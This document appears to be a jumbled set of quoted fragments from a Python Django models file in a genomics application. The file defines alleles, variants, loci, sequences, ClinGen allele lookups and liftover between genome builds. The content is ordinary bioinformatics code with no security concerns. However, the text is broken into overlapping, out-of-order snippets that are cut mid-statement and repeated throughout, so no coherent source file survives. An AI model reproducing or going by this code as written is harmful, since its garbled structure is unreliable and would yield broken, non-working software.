"g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except",
"# Optional, if got a variant but invalid error_message = models.TextField() class Meta:",
"Registry, but sometimes that can fail. Linked against Variant with VariantAllele below \"\"\"",
"not special or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence()",
"def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position,",
"on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if",
"unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def",
"GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE)",
"raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild)",
"= None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def",
"def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants",
"self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry",
"self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN]",
"None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains",
"= self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref,",
"in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by",
"VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return",
"source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def",
"a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP",
"equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele)",
"we'll have the same variant linked through different VariantAlleles (so it can't be",
"import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import",
"indexes but that requires installing the btree_gist extension (requires postgres Admin rights). Django",
"get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs",
"import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN =",
"if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele:",
"this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str:",
"(handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt",
"can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if",
"pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique",
"deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) ->",
"set of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES =",
"flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va =",
"\"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele",
"models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional,",
"grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def",
"self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\",",
"= None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt:",
"on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID",
"not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file",
"in allele {self.id} for build {genome_build}') if not va: va = vas.first() if",
"linked through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE)",
"if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\"",
"subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self):",
"no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs",
"Locus for a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig",
"f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge =",
"self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from",
"queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE)",
"force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s)",
"flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool",
"\"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def",
"set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self):",
"alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt",
"def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref)",
"regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate,",
"g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple",
"= models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash =",
"ClinGen) - but it's not likely. It's a bug to have the same",
"= models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message =",
"not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str,",
"count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\"",
"using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) >",
"merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele:",
"for a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT =",
"allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37",
"if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could",
"== self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard",
"get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource,",
"def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at",
"len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod",
"models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None,",
"Variants with different alt alleles point to the same locus) There is only",
"\"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model):",
"\"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager()",
"def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model):",
"if got a variant but invalid error_message = models.TextField() class Meta: unique_together =",
"from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import Value",
"find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:",
"= models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class",
"allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele)",
"invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return",
"as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) !=",
"alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for",
"False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool,",
"dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq)",
"Allele (may not have been possible to retrieve in all builds, but at",
"if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq)",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance",
"def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod",
"\"\"\" A set of variants - usually used as a cached result \"\"\"",
"models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed {self.liftover}:",
"__str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at",
"= models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def",
"1 alts pointing to the same locus for the row) There is only",
"Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def",
"FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel",
"give error of: \"index row requires x bytes, maximum size is 8191\" The",
"contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if",
"models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant",
"f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA' and",
"import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel",
"VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele",
"string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"),",
":param liftover_complete: If False does not check for missing representations \"\"\" if liftover_complete:",
"not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for build",
"== alt or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq",
"import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from",
"self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal,",
"is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should always",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta: unique_together",
"\"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt,",
"-> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns (chrom, position,",
"None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY",
"solution is to md5sum seq and make the constraint on that. Another possible",
"ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN =",
"= models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\")",
"library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models",
"must have already been created - allele_source used to retrieve them The VCF",
"Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db",
"(ref + >= 1 alts pointing to the same locus for the row)",
"VCF file (multiple Variants with different alt alleles point to the same locus)",
"have already been created - allele_source used to retrieve them The VCF (in",
"on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)",
"reading through a VCF where ID is set to Allele.pk and then creating",
"get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the",
"know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import",
"settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server was down",
"\"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig,",
"slow (API call) If you know a VariantAllele exists for your build, use",
"-> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if",
"self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38)",
"allele_source used to retrieve them The VCF (in genome_build build) is set in",
"if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server was",
"def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if",
"def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True)",
"BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True)",
"Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\",",
"def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool:",
"def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return",
"them The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline",
"+ F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs,",
"(so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants",
"except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params",
"otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) ->",
"end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr):",
"for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig",
"Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}:",
"being represented by 1 loci in the build being used by ClinGen) -",
"re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple",
"library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele",
"per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position =",
"-> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\"",
"force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using,",
"Usually 2+ per line in a VCF file (ref + >= 1 alts",
"only expect to store Alleles for a small fraction of Variants So don't",
"error of: \"index row requires x bytes, maximum size is 8191\" The easiest",
"Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va",
"page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def",
"logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant)",
"exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete()",
"models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38 variants for same",
"REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta:",
"Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups,",
"# handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides",
"\"\"\" This is called at the end of a liftover pipeline (once per",
"dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs:",
"None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return",
"@lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error",
"va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build:",
"one # links there, and can't have another, so it'll work) other_allele.clingen_allele =",
"def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return",
"V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom,",
"sometimes that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele =",
"\"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) ->",
"different alt alleles point to the same locus) There is only 1 Locus",
"= re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"])",
"~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match",
"from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse",
"return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a",
"{self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE)",
"go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]:",
"got a variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover',",
"For others (NCBI Remap) we need to write the source genome build VCF",
"error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(),",
"\"\"\" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt)",
"called at the end of a liftover pipeline (once per build) \"\"\" pass",
"per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus,",
"\"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together =",
"Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref,",
"(multiple Variants with different alt alleles point to the same locus) There is",
"variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool",
"genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple,",
"= self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of",
"allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument",
"position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)",
"str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele:",
"# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds)",
"q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N",
"must match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs =",
"FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} !=",
"variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups()",
"def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of a",
"there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def",
"Return a \"1:123321 G>C\" style string in a query \"\"\" kwargs = {name:",
"Another possible solution is to use Gist indexes but that requires installing the",
"not likely. It's a bug to have the same 3 variant/build/allele so we",
"add that unique_together constraint We only expect to store Alleles for a small",
"from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other",
"(ie not special or reference) \"\"\" # locus.ref should always be standard... return",
"of a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele =",
"from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin,",
"import re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from",
"need to write the source genome build VCF first Alleles must have already",
"other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele =",
"__str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs =",
"default uses indexes for constraints, and large TextFields give error of: \"index row",
"in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod",
"3 variant/build/allele so we can add that unique_together constraint We only expect to",
"represented by 1 loci in the build being used by ClinGen) - but",
"models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model):",
"for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self)",
"AlleleRegistry) we can write the VCF in the desired genome build For others",
"def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF",
"max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt",
"self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool,",
"locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref ==",
"AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None",
